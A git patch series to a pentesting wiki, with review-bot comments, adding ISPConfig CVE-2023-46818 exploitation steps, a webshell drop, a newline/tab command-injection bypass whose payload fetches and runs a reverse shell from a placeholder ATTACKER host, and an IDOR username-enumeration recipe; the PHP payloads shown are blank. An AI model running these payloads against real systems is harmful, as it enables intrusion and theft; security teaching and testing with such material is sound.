From 399a99eefadff23055a7956c008428b541339705 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 27 Aug 2025 19:21:10 +0000 Subject: [PATCH 1/2] =?UTF-8?q?Add=20content=20from:=20HTB=20Nocturnal:=20?= =?UTF-8?q?IDOR=20=E2=86=92=20Command=20Injection=20=E2=86=92=20Root=20via?= =?UTF-8?q?=20ISPConfig...?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - Remove searchindex.js (auto-generated file) --- src/SUMMARY.md | 1 + .../pentesting-web/README.md | 1 + .../pentesting-web/ispconfig.md | 107 ++++++++++++++++++ src/pentesting-web/command-injection.md | 33 ++++++ src/pentesting-web/idor.md | 22 ++++ 5 files changed, 164 insertions(+) create mode 100644 src/network-services-pentesting/pentesting-web/ispconfig.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 1659bf643..987a7b93d 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -430,6 +430,7 @@ - [H2 - Java SQL database](network-services-pentesting/pentesting-web/h2-java-sql-database.md) - [IIS - Internet Information Services](network-services-pentesting/pentesting-web/iis-internet-information-services.md) - [ImageMagick Security](network-services-pentesting/pentesting-web/imagemagick-security.md) + - [Ispconfig](network-services-pentesting/pentesting-web/ispconfig.md) - [JBOSS](network-services-pentesting/pentesting-web/jboss.md) - [Jira & Confluence](network-services-pentesting/pentesting-web/jira.md) - [Joomla](network-services-pentesting/pentesting-web/joomla.md) diff --git a/src/network-services-pentesting/pentesting-web/README.md b/src/network-services-pentesting/pentesting-web/README.md index 41291959b..5cc3a738c 100644 --- a/src/network-services-pentesting/pentesting-web/README.md +++ b/src/network-services-pentesting/pentesting-web/README.md 
@@ -82,6 +82,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno - [**Golang**](golang.md) - [**GraphQL**](graphql.md) - [**H2 - Java SQL database**](h2-java-sql-database.md) +- [**ISPConfig**](ispconfig.md) - [**IIS tricks**](iis-internet-information-services.md) - [**Microsoft SharePoint**](microsoft-sharepoint.md) - [**JBOSS**](jboss.md) diff --git a/src/network-services-pentesting/pentesting-web/ispconfig.md b/src/network-services-pentesting/pentesting-web/ispconfig.md new file mode 100644 index 000000000..3aba03e1c --- /dev/null +++ b/src/network-services-pentesting/pentesting-web/ispconfig.md 
@@ -0,0 +1,107 @@ +# ISPConfig + +{{#include ../../banners/hacktricks-training.md}} + +## Overview + +ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation. + +Key default paths: +- Web root often at `/var/www/ispconfig` when served with `php -S` or via Apache/nginx. +- Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed). + +Tip: If the panel is bound locally (e.g. `127.0.0.1:8080`), forward it: + +```bash +ssh -L 9001:127.0.0.1:8080 user@target +# then browse http://127.0.0.1:9001 +``` + +## Language editor PHP code injection (CVE-2023-46818) + +- Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1) +- Preconditions: + - Login as the built-in superadmin account `admin` (other roles are not affected according to the vendor) + - Language editor must be enabled: `admin_allow_langedit=yes` in `/usr/local/ispconfig/security/security_settings.ini` +- Impact: Authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, achieving RCE in the web context + +References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below. + +### Manual exploitation flow + +1) Open/create a language file to obtain CSRF tokens + +Send a first POST to initialize the form and parse the CSRF fields from the HTML response (`csrf_id`, `csrf_key`). Example request path: `/admin/language_edit.php`. + +2) Inject PHP via records[] and save + +Submit a second POST including the CSRF fields and a malicious translation record. 
Minimal command-execution probes: + +```http +POST /admin/language_edit.php HTTP/1.1 +Host: 127.0.0.1:9001 +Content-Type: application/x-www-form-urlencoded +Cookie: ispconfig_auth=... + +lang=en&module=admin&file=messages&csrf_id=&csrf_key=&records[]= +``` + +Out-of-band test (observe ICMP): + +```http +records[]= +``` + +3) Write files and drop a webshell + +Use `file_put_contents` to create a file under a web-reachable path (e.g., `admin/`): + +```http +records[]= +``` + +Then write a simple webshell using base64 to avoid bad characters in the POST body: + +```http +records[]= +``` + +Use it: + +```bash +curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id' +``` + +If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user. + +### Python PoC + +A ready-to-use exploit automates token handling and payload delivery: +- [https://github.com/bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit) + +Example run: + +```bash +python3 cve-2023-46818.py http://127.0.0.1:9001 admin +``` + +### Hardening + +- Upgrade to 3.2.11p1 or later +- Disable the language editor unless strictly needed: + +``` +admin_allow_langedit=no +``` + +- Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges +- Enforce strong authentication for the built-in `admin` account + +## References + +- [ISPConfig 3.2.11p1 Released (fixes language editor code injection)](https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/) +- [CVE-2023-46818 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818) +- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit) +- [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) + +{{#include ../../banners/hacktricks-training.md}} 
diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 678e0772a..9ac7b730e 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -131,6 +131,37 @@ powershell C:**2\n??e*d.*? # notepad ../linux-hardening/bypass-bash-restrictions/ {{#endref}} +##### Newline and tab blacklist bypass (space and metacharacters filtered) + +Many “naive blacklist” filters block space and shell metacharacters like `;`, `&`, `|`, `` ` ``, `{`, `}`, `&&`, but forget to block newlines (`%0a`) and tabs (`%09`). If user input is concatenated into a shell command (for example via PHP `proc_open()`/`system()`), you can: + +- Inject a newline to start a new command +- Use tabs as whitespace where space is blocked + +Example payload for a password-like field reaching a shell (URL-encoded): + +``` +0xdf%0abash%09-c%09"id"%0a +``` + +The resulting process executes as two lines: + +``` +zip -x './backups/*' -r -P 0xdf +bash -c "id" +``` + +Chaining without `&`: fetch and execute a reverse shell in separate lines: + +``` +0xdf%0abash%09-c%09"curl%09http://ATTACKER/rev.sh"%0abash%09rev.sh%0a +``` + +Notes +- Newlines are command separators for POSIX shells; tabs are valid whitespace. +- This works even if spaces and `;|&` are filtered, as long as `\n` and `\t` are not. +- See PHP docs for `proc_open()`/`system()` behavior when given a string (it spawns `/bin/sh -c`). + ### Node.js `child_process.exec` vs `execFile` When auditing JavaScript/TypeScript back-ends you will often encounter the Node.js `child_process` API. 
@@ -170,5 +201,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection) - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) +- [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php) +- [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) {{#include ../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/idor.md b/src/pentesting-web/idor.md index e0f95bfdf..f6d16630e 100644 --- a/src/pentesting-web/idor.md +++ b/src/pentesting-web/idor.md 
@@ -38,6 +38,27 @@ for id in $(seq 64185742 64185700); do done ``` +--- + +### Error-response oracle for user/file enumeration + +When a download endpoint accepts both a username and a filename (e.g. `/view.php?username=&file=`), subtle differences in error messages often create an oracle: + +- Non-existent username → "User not found" +- Bad filename but valid extension → "File does not exist" (sometimes also lists available files) +- Bad extension → validation error + +With any authenticated session, you can fuzz the username parameter while holding a benign filename and filter on the "user not found" string to discover valid users: + +```bash +ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \ + -b 'PHPSESSID=' \ + -w /opt/SecLists/Usernames/Names/names.txt \ + -fr 'User not found' +``` + +Once valid usernames are identified, request specific files directly (e.g., `/view.php?username=amanda&file=privacy.odt`). This pattern commonly leads to unauthorized disclosure of other users’ documents and credential leakage. + --- ## 2. Real-World Case Study – McHire Chatbot Platform (2025) @@ -86,4 +107,5 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces * [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII](https://ian.sh/mcdonalds) * [OWASP Top 10 – Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/) * [How to Find More IDORs – Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489) +* [HTB Nocturnal: IDOR oracle → file theft](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) {{#include ../banners/hacktricks-training.md}} From ff4d1db05b71d742089aa9ca929b12724183eea2 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Thu, 28 Aug 2025 12:05:50 +0200 Subject: [PATCH 2/2] Update command-injection.md --- src/pentesting-web/command-injection.md | 32 +------------------------ 1 file changed, 1 insertion(+), 31 deletions(-) 
diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 9ac7b730e..8529062f6 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -19,6 +19,7 @@ ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe) ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º ls %0A id # %0A Execute both (RECOMMENDED) +ls%0abash%09-c%09"id"%0a # (Combining new lines and tabs) #Only unix supported `ls` # `` @@ -131,37 +132,6 @@ powershell C:**2\n??e*d.*? # notepad ../linux-hardening/bypass-bash-restrictions/ {{#endref}} -##### Newline and tab blacklist bypass (space and metacharacters filtered) - -Many “naive blacklist” filters block space and shell metacharacters like `;`, `&`, `|`, `` ` ``, `{`, `}`, `&&`, but forget to block newlines (`%0a`) and tabs (`%09`). If user input is concatenated into a shell command (for example via PHP `proc_open()`/`system()`), you can: - -- Inject a newline to start a new command -- Use tabs as whitespace where space is blocked - -Example payload for a password-like field reaching a shell (URL-encoded): - -``` -0xdf%0abash%09-c%09"id"%0a -``` - -The resulting process executes as two lines: - -``` -zip -x './backups/*' -r -P 0xdf -bash -c "id" -``` - -Chaining without `&`: fetch and execute a reverse shell in separate lines: - -``` -0xdf%0abash%09-c%09"curl%09http://ATTACKER/rev.sh"%0abash%09rev.sh%0a -``` - -Notes -- Newlines are command separators for POSIX shells; tabs are valid whitespace. -- This works even if spaces and `;|&` are filtered, as long as `\n` and `\t` are not. -- See PHP docs for `proc_open()`/`system()` behavior when given a string (it spawns `/bin/sh -c`). - ### Node.js `child_process.exec` vs `execFile` When auditing JavaScript/TypeScript back-ends you will often encounter the Node.js `child_process` API.
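Review bot: the new SUMMARY.md entry `- [Ispconfig](network-services-pentesting/pentesting-web/ispconfig.md)` capitalises the name differently from the page heading `# ISPConfig` and from the README link `[**ISPConfig**](ispconfig.md)` added in the same patch; use `[ISPConfig]` so the sidebar, the index and the page title agree.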
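Review bot: in the pentesting-web README hunk the new `- [**ISPConfig**](ispconfig.md)` line lands before `- [**IIS tricks**]`, whereas SUMMARY.md in the same patch places the page after IIS and ImageMagick; keep the two indexes in the same order (after the IIS entry) so readers find the page in the same spot in both.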
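Review bot: in the new ispconfig.md the four `records[]=` request bodies under "Minimal command-execution probes", "Out-of-band test" and step 3 carry no value at all, so the page describes a malformed translation record but never shows what one looks like; this reads like the PHP tags were dropped when the markdown was rendered and needs checking before merge. Smaller points in the same file: `csrf_id=&csrf_key=` in the first request should be marked as the values parsed in step 1 rather than left blank; the `admin_allow_langedit=no` fence under "Hardening" should name the file it belongs to (`/usr/local/ispconfig/security/security_settings.ini`, already given under "Preconditions") and carry a language tag like the other fences; and "Web root often at `/var/www/ispconfig` when served with `php -S`" describes the HTB Nocturnal setup rather than a default, so it belongs next to the port-forward tip, not under "Key default paths".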
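Review bot: the new section in command-injection.md is headed `#####` directly under `###`-level siblings, skipping a level, and its worked example (`zip -x './backups/*' -r -P 0xdf` followed by `bash -c "id"`) depends on the HTB Nocturnal `zip -P` context that the page never introduces; either add one sentence saying the injected field is a zip password concatenated into that command, or keep only the generic `%0a`/`%09` explanation and the first payload. PATCH 2/2 later removes this section entirely, so this only matters if the first patch is taken on its own.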
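Review bot: the HTB reference added to the command-injection.md references list writes the CVE id with non-breaking hyphens (`CVE‑2023‑46818`), so a text search for `CVE-2023-46818` will not match it; use plain ASCII hyphens, as ispconfig.md in the same patch does.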
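Review bot: in the idor.md hunk the example endpoint `/view.php?username=&file=` and the ffuf cookie `-b 'PHPSESSID='` are left with empty values, which look like placeholders (`<user>`, `<file>`, `<session cookie>`) that were stripped; spell them out so the reader can tell what goes where. The section also documents the oracle without its fix: one sentence saying the remediation is a single generic error for every failure case plus a server-side check that the requested file belongs to the session's user would make the entry useful from the defensive side too, and ties in with the OWASP Broken Access Control reference already in the list.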
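Review bot: the line added to the separator list in PATCH 2/2, `ls%0abash%09-c%09"id"%0a # (Combining new lines and tabs)`, is a URL-encoded payload among otherwise raw shell examples, and its comment no longer says why tabs matter once the explanatory section is removed; make the comment carry that, e.g. `# %0A newline + %09 tab as whitespace, for filters that block spaces`, so the one-liner explains itself like the `ls %0A id` line above it.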
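Review bot: the removal hunk in PATCH 2/2 deletes the whole newline/tab section but leaves the `[PHP proc_open manual]` reference that PATCH 1/2 added for it (the references hunk is not touched, and the diffstat shows 1 insertion, 31 deletions); after both patches that entry cites nothing on the page, so drop it together with the section or keep a one-line note on `proc_open()`/`system()` spawning `/bin/sh -c` that still uses it.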